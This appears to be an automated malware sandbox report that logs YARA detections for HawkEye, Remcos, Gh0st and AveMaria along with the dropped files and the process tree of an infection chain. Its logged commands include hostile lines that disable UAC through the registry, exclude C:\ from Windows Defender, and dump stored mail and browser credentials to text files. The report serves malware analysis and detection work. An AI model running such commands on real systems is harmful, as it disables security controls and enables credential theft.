                    Source: 0000002C.00000002.921256513.00000000076B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0000002C.00000002.917761840.0000000003881000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000002C.00000002.917761840.0000000003881000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000002.00000000.674013020.0000000000403000.00000040.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000003.00000002.939479958.000000000362C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000003.00000003.684248310.0000000000D0E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000028.00000001.798523188.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000028.00000001.798523188.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001D.00000002.731576486.00000000034A2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000002.00000003.676858560.0000000000797000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 00000003.00000002.939106389.0000000002CD6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 0000002C.00000002.916420859.0000000002881000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000002C.00000002.916420859.0000000002881000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000003.00000000.680273151.000000000021F000.00000002.00020000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 0000002C.00000000.861719615.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000002C.00000000.861719615.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPEDMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPEDMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPEDMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPEDMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,1_2_004030E3
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0041360B ExitWindowsEx,LoadLibraryA,GetProcAddress,4_2_0041360B
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: String function: 004308A0 appears 53 times
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: String function: 004301F3 appears 38 times
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: String function: 00402076 appears 50 times
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00414B29 CreateProcessW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,4_2_00414B29
                    Source: bin.exe.2.drStatic PE information: Resource name: WM_DSP type: PE32 executable (GUI) Intel 80386, for MS Windows
                    Source: xxTzyGLZx5.exe, 00000001.00000003.668379876.0000000014AEF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs xxTzyGLZx5.exe
                    Source: xxTzyGLZx5.exe, 00000001.00000003.668147890.0000000014956000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs xxTzyGLZx5.exe
                    Source: xxTzyGLZx5.exe, 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameViottoBinder_Stub.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPA vs xxTzyGLZx5.exe
                    Source: xxTzyGLZx5.exe, 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameViottoBinder_Stub.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPA vs xxTzyGLZx5.exe
                    Source: xxTzyGLZx5.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                    Source: C:\Users\user\AppData\Local\Temp\21.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeFile created: C:\Users\user\AppData\Local\Microsoft Vision\Jump to behavior
                    Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winEXE@62/52@12/7
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00416D71 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,4_2_00416D71
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00417629 FindResourceA,LoadResource,LockResource,SizeofResource,4_2_00417629
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeFile created: C:\Program Files\Microsoft DN1Jump to behavior
                    Source: xxTzyGLZx5.exeVirustotal: Detection: 30%
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeFile read: C:\Users\user\Desktop\xxTzyGLZx5.exeJump to behavior
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\xxTzyGLZx5.exe "C:\Users\user\Desktop\xxTzyGLZx5.exe"
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess created: C:\Users\user\Desktop\xxTzyGLZx5.exe "C:\Users\user\Desktop\xxTzyGLZx5.exe"
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe" 0
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess created: C:\Users\user\AppData\Local\Temp\rem9090sta.exe "C:\Users\user\AppData\Local\Temp\rem9090sta.exe" 0
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeProcess created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe "C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe"
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\moyvwyrrsmhoowrqsha"
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\wilgxqclgvztqcfubsndyj"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe "C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\dwn.exe "C:\Users\user\AppData\Roaming\Remcos\dwn.exe"
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess created: C:\Users\user\AppData\Local\Temp\21.exe "C:\Users\user\AppData\Local\Temp\21.exe" 0
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess created: C:\Users\user\AppData\Local\Temp\5.exe "C:\Users\user\AppData\Local\Temp\5.exe" 0
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess created: C:\Users\user\AppData\Local\Temp\4.exe "C:\Users\user\AppData\Local\Temp\4.exe" 0
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess created: C:\Users\user\AppData\Local\Temp\21.exe "C:\Users\user\AppData\Local\Temp\21.exe" 0
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess created: C:\Users\user\AppData\Local\Temp\5.exe "C:\Users\user\AppData\Local\Temp\5.exe" 0
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess created: C:\Users\user\AppData\Local\Temp\4.exe "C:\Users\user\AppData\Local\Temp\4.exe" 0
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe"
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe"
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2132
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess created: C:\Users\user\Desktop\xxTzyGLZx5.exe "C:\Users\user\Desktop\xxTzyGLZx5.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe" 0Jump to behavior
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeProcess created: C:\Users\user\AppData\Local\Temp\rem9090sta.exe "C:\Users\user\AppData\Local\Temp\rem9090sta.exe" 0Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeProcess created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" Jump to behavior
